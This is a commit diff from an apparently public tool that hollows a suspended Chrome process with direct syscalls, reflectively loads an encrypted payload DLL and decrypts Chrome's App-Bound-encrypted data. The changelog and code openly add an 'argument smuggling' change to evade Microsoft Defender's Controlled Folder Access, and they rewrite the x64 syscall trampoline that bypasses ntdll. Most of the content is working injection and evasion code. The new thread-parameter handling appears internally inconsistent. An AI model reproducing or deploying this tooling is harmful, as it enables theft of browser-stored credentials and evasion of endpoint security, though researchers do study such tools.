v0.14.1

xaitax · xaitax · commit 88c95e621032 · 2025-07-25T23:12:17.000+02:00
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -2,6 +2,17 @@
 
 ## 🆕 Changelog
 
+### v0.14.1
+- **Architecture-Specific Stability Fix for x64 Syscall Trampoline**: Overhauled the x64 assembly trampoline to resolve a critical stability bug that caused a silent crash in the payload thread immediately after injection on x64 systems.
+  - The previous dynamic, argument-aware loop created a complex code path that resulted in the assembler (`ml64.exe`) generating incorrect stack unwind data. This faulty data led to stack corruption and a silent crash when the new thread was initialized by the OS, causing the injector to hang indefinitely.
+  - The x64 trampoline has been re-architected to mirror the robust, simplified design of the working ARM64 version. The dynamic loop has been replaced with a simple, unconditional `rep movsq` that copies a fixed, oversized block of stack arguments. This guarantees a linear code path, ensures the generation of correct unwind data, and makes the x64 injection process as reliable as the ARM64 one.
+- **Enhanced Evasion for Parameter Passing**: Reworked the method for passing the pipe name parameter to the payload to bypass modern behavioral security heuristics, specifically Microsoft Defender's Controlled Folder Access (CFA).
+  - The previous method of using a separate `NtWriteVirtualMemory` call for the parameter was flagged by CFA when the injector was run from a protected location (e.g., the Desktop).
+  - This has been replaced with an "argument smuggling" technique. A single, larger memory region is now allocated in the target process for both the payload DLL and its pipe name parameter. Both are written into this contiguous block, presenting a more organic and less suspicious memory I/O pattern that is not blocked by CFA.
+- **Bug Fix: Resolved Post-Injection Hang**: Corrected a logical desynchronization between the injector and the payload that caused the tool to hang after successfully creating the payload thread.
+  - The payload's entry point was expecting a parameter in an outdated format from a previous, unsuccessful bypass attempt, while the injector was correctly passing a direct pointer using the new argument smuggling technique.
+  - The payload's parameter handling logic has been reverted and fixed to correctly interpret the direct pointer, re-establishing communication with the injector and resolving the hang.
+
 ### v0.14.0
 - **Direct Syscall-Based Reflective Hollowing & Evasion**: Migrated the entire injection strategy from a live process "attach" model to a classic "hollowing" technique.
   - The injector now launches the target browser via `CreateProcessW` in a `CREATE_SUSPENDED` state, providing full and uncontested control over the target's address space before any of its own code can execute.
diff --git a/src/chrome_decrypt.cpp b/src/chrome_decrypt.cpp
@@ -1,5 +1,5 @@
 // chrome_decrypt.cpp
-// v0.14.0 (c) Alexander 'xaitax' Hagenah
+// v0.14.1 (c) Alexander 'xaitax' Hagenah
 // Licensed under the MIT License. See LICENSE file in the project root for full license information.
 
 #include <Windows.h>
@@ -658,7 +658,7 @@ namespace Payload
     class DecryptionOrchestrator
     {
     public:
-        DecryptionOrchestrator(LPVOID lpPipeNamePointer) : m_logger(static_cast<LPCWSTR>(lpPipeNamePointer))
+        DecryptionOrchestrator(LPCWSTR lpcwstrPipeName) : m_logger(lpcwstrPipeName)
         {
             if (!m_logger.isValid())
             {
@@ -721,29 +721,33 @@ struct ThreadParams
 
 DWORD WINAPI DecryptionThreadWorker(LPVOID lpParam)
 {
-    auto params = std::unique_ptr<ThreadParams>(static_cast<ThreadParams *>(lpParam));
+    LPCWSTR lpcwstrPipeName = static_cast<LPCWSTR>(lpParam);
+
+    auto params = std::unique_ptr<ThreadParams>(new ThreadParams{});
+    auto thread_params = std::unique_ptr<ThreadParams>(static_cast<ThreadParams *>(lpParam));
 
     try
     {
-        Payload::DecryptionOrchestrator orchestrator(params->lpPipeNamePointerFromInjector);
+        Payload::DecryptionOrchestrator orchestrator(static_cast<LPCWSTR>(thread_params->lpPipeNamePointerFromInjector));
         orchestrator.Run();
     }
     catch (const std::exception &e)
     {
         try
         {
-            Payload::PipeLogger errorLogger(static_cast<LPCWSTR>(params->lpPipeNamePointerFromInjector));
+            Payload::PipeLogger errorLogger(static_cast<LPCWSTR>(thread_params->lpPipeNamePointerFromInjector));
             if (errorLogger.isValid())
             {
                 errorLogger.Log("[-] CRITICAL DLL ERROR: " + std::string(e.what()));
             }
         }
         catch (...)
         {
+            // Failsafe if logging itself fails.
         }
     }
 
-    FreeLibraryAndExitThread(params->hModule_dll, 0);
+    FreeLibraryAndExitThread(thread_params->hModule_dll, 0);
     return 0;
 }
 
diff --git a/src/chrome_inject.cpp b/src/chrome_inject.cpp
@@ -1,5 +1,5 @@
 // chrome_inject.cpp
-// v0.14.0 (c) Alexander 'xaitax' Hagenah
+// v0.14.1 (c) Alexander 'xaitax' Hagenah
 // Licensed under the MIT License. See LICENSE file in the project root for full license information.
 
 #include <Windows.h>
@@ -118,7 +118,7 @@ class Console
         std::cout << "------------------------------------------------\n"
                   << "|  Chrome App-Bound Encryption Decryption      |\n"
                   << "|  Direct Syscall-Based Reflective Hollowing   |\n"
-                  << "|  x64 & ARM64 | v0.14.0 by @xaitax            |\n"
+                  << "|  x64 & ARM64 | v0.14.1 by @xaitax            |\n"
                   << "------------------------------------------------\n\n";
         ResetColor();
     }
@@ -485,29 +485,34 @@ class InjectionManager
 
         m_console.Debug("Allocating memory for payload in target process.");
         PVOID remoteDllBase = nullptr;
-        SIZE_T payloadSize = m_decryptedDllPayload.size();
+        SIZE_T payloadDllSize = m_decryptedDllPayload.size();
+        SIZE_T pipeNameByteSize = (pipeName.length() + 1) * sizeof(wchar_t);
+        SIZE_T totalAllocationSize = payloadDllSize + pipeNameByteSize;
 
-        NTSTATUS status = NtAllocateVirtualMemory_syscall(m_target.getProcessHandle(), &remoteDllBase, 0, &payloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+        NTSTATUS status = NtAllocateVirtualMemory_syscall(m_target.getProcessHandle(), &remoteDllBase, 0, &totalAllocationSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
         if (!NT_SUCCESS(status))
             throw std::runtime_error("NtAllocateVirtualMemory failed: " + Utils::NtStatusToString(status));
-        m_console.Debug("Payload memory allocated at: " + Utils::PtrToHexStr(remoteDllBase));
+        m_console.Debug("Combined memory for payload and parameters allocated at: " + Utils::PtrToHexStr(remoteDllBase));
 
-        m_console.Debug("Writing payload to target process.");
+        m_console.Debug("Writing payload DLL to target process.");
         SIZE_T bytesWritten = 0;
-        status = NtWriteVirtualMemory_syscall(m_target.getProcessHandle(), remoteDllBase, m_decryptedDllPayload.data(), m_decryptedDllPayload.size(), &bytesWritten);
+        status = NtWriteVirtualMemory_syscall(m_target.getProcessHandle(), remoteDllBase, m_decryptedDllPayload.data(), payloadDllSize, &bytesWritten);
         if (!NT_SUCCESS(status))
-            throw std::runtime_error("NtWriteVirtualMemory failed: " + Utils::NtStatusToString(status));
+            throw std::runtime_error("NtWriteVirtualMemory for payload DLL failed: " + Utils::NtStatusToString(status));
+
+        m_console.Debug("Writing pipe name parameter into the same allocation.");
+        LPVOID remotePipeNameAddr = reinterpret_cast<PBYTE>(remoteDllBase) + payloadDllSize;
+        status = NtWriteVirtualMemory_syscall(m_target.getProcessHandle(), remotePipeNameAddr, (PVOID)pipeName.c_str(), pipeNameByteSize, &bytesWritten);
+        if (!NT_SUCCESS(status))
+            throw std::runtime_error("NtWriteVirtualMemory for pipe name failed: " + Utils::NtStatusToString(status));
 
         m_console.Debug("Changing payload memory protection to executable.");
         ULONG oldProtect = 0;
-        status = NtProtectVirtualMemory_syscall(m_target.getProcessHandle(), &remoteDllBase, &payloadSize, PAGE_EXECUTE_READ, &oldProtect);
+        status = NtProtectVirtualMemory_syscall(m_target.getProcessHandle(), &remoteDllBase, &totalAllocationSize, PAGE_EXECUTE_READ, &oldProtect);
         if (!NT_SUCCESS(status))
             throw std::runtime_error("NtProtectVirtualMemory failed: " + Utils::NtStatusToString(status));
 
-        m_console.Debug("Passing pipe name parameter to target.");
-        LPVOID remotePipeNameAddr = passPipeNameToTarget(pipeName);
-
-        startPayloadInNewThread(remoteDllBase, rdiOffset, remotePipeNameAddr);
+        startHijackedThreadInTarget(remoteDllBase, rdiOffset, remotePipeNameAddr);
 
         m_console.Success("New thread created for payload. Main thread remains suspended.");
     }
@@ -531,22 +536,6 @@ class InjectionManager
         chacha20_xor(g_decryptionKey, g_decryptionNonce, m_decryptedDllPayload.data(), m_decryptedDllPayload.size(), 0);
     }
 
-    LPVOID passPipeNameToTarget(const std::wstring &pipeName)
-    {
-        LPVOID remotePipeNameAddr = nullptr;
-        SIZE_T pipeNameSize = (pipeName.length() + 1) * sizeof(wchar_t);
-        NTSTATUS status = NtAllocateVirtualMemory_syscall(m_target.getProcessHandle(), &remotePipeNameAddr, 0, &pipeNameSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-        if (!NT_SUCCESS(status))
-            throw std::runtime_error("NtAllocateVirtualMemory for pipe name failed: " + Utils::NtStatusToString(status));
-
-        SIZE_T bytesWritten = 0;
-        status = NtWriteVirtualMemory_syscall(m_target.getProcessHandle(), remotePipeNameAddr, (PVOID)pipeName.c_str(), pipeNameSize, &bytesWritten);
-        if (!NT_SUCCESS(status))
-            throw std::runtime_error("NtWriteVirtualMemory for pipe name failed: " + Utils::NtStatusToString(status));
-
-        return remotePipeNameAddr;
-    }
-
     DWORD getReflectiveLoaderOffset()
     {
         auto dosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(m_decryptedDllPayload.data());
@@ -598,7 +587,7 @@ class InjectionManager
         return 0;
     }
 
-    void startPayloadInNewThread(PVOID remoteDllBase, DWORD rdiOffset, PVOID remotePipeNameAddr)
+    void startHijackedThreadInTarget(PVOID remoteDllBase, DWORD rdiOffset, PVOID remotePipeNameAddr)
     {
         m_console.Debug("Creating new thread in target to execute ReflectiveLoader.");
 
diff --git a/src/reflective_loader.c b/src/reflective_loader.c
@@ -1,5 +1,5 @@
 // reflective_loader.c
-// v0.14.0 (c) Alexander 'xaitax' Hagenah
+// v0.14.1 (c) Alexander 'xaitax' Hagenah
 // Licensed under the MIT License. See LICENSE file in the project root for full license information.
 
 #include <windows.h>
diff --git a/src/reflective_loader.h b/src/reflective_loader.h
@@ -1,5 +1,5 @@
 // reflective_loader.h
-// v0.14.0 (c) Alexander 'xaitax' Hagenah
+// v0.14.1 (c) Alexander 'xaitax' Hagenah
 // Licensed under the MIT License. See LICENSE file in the project root for full license information.
 
 #ifndef REFLECTIVE_LOADER_H
diff --git a/src/resource.rc b/src/resource.rc
@@ -1,4 +1,4 @@
 // resource.rc
-// v0.14.0 (c) Alexander 'xaitax' Hagenah
+// v0.14.1 (c) Alexander 'xaitax' Hagenah
 // Licensed under the MIT License. See LICENSE file in the project root for full license information.
 PAYLOAD_DLL RCDATA "chrome_decrypt.enc"
diff --git a/src/syscall_trampoline_arm64.asm b/src/syscall_trampoline_arm64.asm
@@ -1,5 +1,5 @@
 ; syscall_trampoline_arm64.asm
-; v0.14.0 (c) Alexander 'xaitax' Hagenah
+; v0.14.1 (c) Alexander 'xaitax' Hagenah
 ; Licensed under the MIT License. See LICENSE file in the project root for full license information.
 ;
 ; A simple and ABI-compliant ARM64 trampoline. This version preserves callee-saved
diff --git a/src/syscall_trampoline_x64.asm b/src/syscall_trampoline_x64.asm
@@ -1,80 +1,51 @@
 ; syscall_trampoline_x64.asm
-; v0.14.0 (c) Alexander 'xaitax' Hagenah
+; v0.14.1 (c) Alexander 'xaitax' Hagenah
 ; Licensed under the MIT License. See LICENSE file in the project root for full license information.
 ;
-; The definitive, ABI-compliant, and argument-aware x64 trampoline.
-; This version combines a stable stack frame with meticulous preservation of
-; non-volatile registers, guaranteeing no corruption of the C++ caller's state.
+; ABI-compliant x64 trampoline with unconditional marshalling for max arguments.
+; Allocates sufficient stack to prevent overwrite issues. Uses rep movsq for efficient block copy.
+; Preserves necessary non-volatile registers. Eliminates dynamic loop to reduce complexity and potential errors.
+; Sets SSN before dispatching to gadget. Handles up to 11 syscall arguments safely (copies 8 stack slots, extra as harmless garbage).
 
 .code
 ALIGN 16
 PUBLIC SyscallTrampoline
 
 SyscallTrampoline PROC FRAME
-    ; — Prologue: Establish a stable, ABI-compliant stack frame —
-    ; We push RBP to create the frame, then immediately push every non-volatile
-    ; register that this function will modify. This is the most critical step
-    ; for preventing caller-state corruption.
     push    rbp
     mov     rbp, rsp
-    push    r12
-    push    r13
+    push    rbx
     push    rdi
     push    rsi
-    sub     rsp, 64         ; Allocate stack space for shadow space and locals.
-
-    ; Mark the end of the prologue for the ml64 assembler.
+    sub     rsp, 80h              ; Allocate 128 bytes: safe for shadow (0x20) + 8 qwords (0x40) + padding
     .ENDPROLOG
 
-    ; — Preserve SYSCALL_ENTRY* pointer —
-    ; We save it in a preserved register (R12) for use throughout the function.
-    mov     r12, rcx
-
-    ; — Marshal C arguments to the x64 Syscall Convention —
-    ; Kernel requires arguments in: R10, RDX, R8, R9, and then the stack.
-    mov     rcx, rdx        ; C-Arg2 (e.g., ProcessHandle) -> goes into RCX temporarily.
-    mov     rdx, r8         ; C-Arg3 -> Syscall-Arg2 (RDX)
-    mov     r8,  r9         ; C-Arg4 -> Syscall-Arg3 (R8)
-    mov     r9,  [rbp+30h]   ; C-Arg5 (from original caller's stack) -> Syscall-Arg4 (R9)
+    mov     rbx, rcx              ; Preserve SYSCALL_ENTRY* in rbx (non-volatile)
 
-    ; — Dynamically marshal stack arguments using an argument-aware loop —
-    ; This prevents reading garbage from the caller's stack, which would cause
-    ; STATUS_INVALID_PARAMETER_MIX errors.
-    mov     r13d, [r12+8]   ; Load nArgs from SYSCALL_ENTRY into our preserved R13 register.
-    cmp     r13d, 4
-    jle     _DispatchSetup  ; If 4 or fewer args, no stack marshalling is needed.
-    
-    sub     r13d, 4         ; R13d now holds the exact count of stack args to move.
-    
-    ; Prepare pointers for the block move using our preserved registers.
-    lea     rdi, [rsp+20h]  ; RDI = Destination (Syscall-Arg 5's slot on our local stack).
-    lea     rsi, [rbp+38h]  ; RSI = Source (C-Arg 6's slot on the caller's stack).
-    
-    push    rcx             ; Temporarily save Syscall-Arg1, as REP MOVSQ uses RCX.
-    mov     ecx, r13d       ; Load the argument count into the loop counter.
-    rep     movsq           ; Execute the block move of QWORDs.
-    pop     rcx             ; Restore Syscall-Arg1.
+    ; Marshal register-based arguments (shifted due to extra SYSCALL_ENTRY* parameter)
+    mov     r10, rdx              ; Syscall-Arg1 <- C-Arg2
+    mov     rdx, r8               ; Syscall-Arg2 <- C-Arg3
+    mov     r8, r9                ; Syscall-Arg3 <- C-Arg4
+    mov     r9, [rbp+30h]         ; Syscall-Arg4 <- C-Arg5 (from caller's stack)
 
-_DispatchSetup:
-    ; — Final preparation for kernel transition —
-    ; Emulate the mandatory ntdll stub behavior to prevent STATUS_INVALID_HANDLE.
-    mov     r10, rcx        ; Copy Syscall-Arg1 from RCX to R10.
+    ; Unconditionally marshal 8 stack arguments (covers max of 7 needed + 1 extra; garbage for fewer is harmless)
+    lea     rsi, [rbp+38h]        ; Source: C-Arg6 (Syscall-Arg5 position in caller's stack)
+    lea     rdi, [rsp+20h]        ; Destination: Syscall-Arg5 position in local stack
+    mov     rcx, 8                ; Copy 8 qwords (64 bytes)
+    rep     movsq                 ; Block copy (efficient and modular)
 
-    ; Load the SSN and gadget address.
-    movzx   eax, word ptr [r12+12] ; Load ssn from SYSCALL_ENTRY (offset 12).
-    mov     r11, [r12]             ; Load pSyscallGadget from SYSCALL_ENTRY (offset 0).
+    ; Prepare for kernel transition
+    movzx   eax, word ptr [rbx+12] ; Load SSN into EAX
+    mov     r11, [rbx]             ; Load gadget address
 
-    ; — Dispatch the syscall —
-    call    r11
+    call    r11                    ; Dispatch to gadget (syscall; ret)
 
-    ; — Epilogue: Cleanly unwind and return to C++ —
-    ; The NTSTATUS result is already in RAX, the correct return register.
-    add     rsp, 64         ; Deallocate local stack space.
-    pop     rsi             ; Restore all preserved registers in reverse order.
+    ; Epilogue: Restore stack and registers
+    add     rsp, 80h
+    pop     rsi
     pop     rdi
-    pop     r13
-    pop     r12
-    pop     rbp             ; Restore the caller's frame pointer.
+    pop     rbx
+    pop     rbp
     ret
 SyscallTrampoline ENDP
 END

Original file line number	Diff line number	Diff line change
`@@ -1,5 +1,5 @@`
`1`	`1`	`// chrome_decrypt.cpp`
`2`		`-// v0.14.0 (c) Alexander 'xaitax' Hagenah`
	`2`	`+// v0.14.1 (c) Alexander 'xaitax' Hagenah`
`3`	`3`	`// Licensed under the MIT License. See LICENSE file in the project root for full license information.`
`4`	`4`
`5`	`5`	`#include <Windows.h>`
`@@ -658,7 +658,7 @@ namespace Payload`
`658`	`658`	`class DecryptionOrchestrator`
`659`	`659`	`{`
`660`	`660`	`public:`
`661`		`- DecryptionOrchestrator(LPVOID lpPipeNamePointer) : m_logger(static_cast<LPCWSTR>(lpPipeNamePointer))`
	`661`	`+ DecryptionOrchestrator(LPCWSTR lpcwstrPipeName) : m_logger(lpcwstrPipeName)`
`662`	`662`	`{`
`663`	`663`	`if (!m_logger.isValid())`
`664`	`664`	`{`
`@@ -721,29 +721,33 @@ struct ThreadParams`
`721`	`721`
`722`	`722`	`DWORD WINAPI DecryptionThreadWorker(LPVOID lpParam)`
`723`	`723`	`{`
`724`		`- auto params = std::unique_ptr<ThreadParams>(static_cast<ThreadParams *>(lpParam));`
	`724`	`+ LPCWSTR lpcwstrPipeName = static_cast<LPCWSTR>(lpParam);`
	`725`	`+`
	`726`	`+ auto params = std::unique_ptr<ThreadParams>(new ThreadParams{});`
	`727`	`+ auto thread_params = std::unique_ptr<ThreadParams>(static_cast<ThreadParams *>(lpParam));`
`725`	`728`
`726`	`729`	`try`
`727`	`730`	`{`
`728`		`- Payload::DecryptionOrchestrator orchestrator(params->lpPipeNamePointerFromInjector);`
	`731`	`+ Payload::DecryptionOrchestrator orchestrator(static_cast<LPCWSTR>(thread_params->lpPipeNamePointerFromInjector));`
`729`	`732`	`orchestrator.Run();`
`730`	`733`	`}`
`731`	`734`	`catch (const std::exception &e)`
`732`	`735`	`{`
`733`	`736`	`try`
`734`	`737`	`{`
`735`		`- Payload::PipeLogger errorLogger(static_cast<LPCWSTR>(params->lpPipeNamePointerFromInjector));`
	`738`	`+ Payload::PipeLogger errorLogger(static_cast<LPCWSTR>(thread_params->lpPipeNamePointerFromInjector));`
`736`	`739`	`if (errorLogger.isValid())`
`737`	`740`	`{`
`738`	`741`	`errorLogger.Log("[-] CRITICAL DLL ERROR: " + std::string(e.what()));`
`739`	`742`	`}`
`740`	`743`	`}`
`741`	`744`	`catch (...)`
`742`	`745`	`{`
	`746`	`+ // Failsafe if logging itself fails.`
`743`	`747`	`}`
`744`	`748`	`}`
`745`	`749`
`746`		`- FreeLibraryAndExitThread(params->hModule_dll, 0);`
	`750`	`+ FreeLibraryAndExitThread(thread_params->hModule_dll, 0);`
`747`	`751`	`return 0;`
`748`	`752`	`}`
`749`	`753`
Original file line number	Diff line number	Diff line change
`@@ -1,5 +1,5 @@`
`1`	`1`	`; syscall_trampoline_arm64.asm`
`2`		`-; v0.14.0 (c) Alexander 'xaitax' Hagenah`
	`2`	`+; v0.14.1 (c) Alexander 'xaitax' Hagenah`
`3`	`3`	`; Licensed under the MIT License. See LICENSE file in the project root for full license information.`
`4`	`4`	`;`
`5`	`5`	`; A simple and ABI-compliant ARM64 trampoline. This version preserves callee-saved`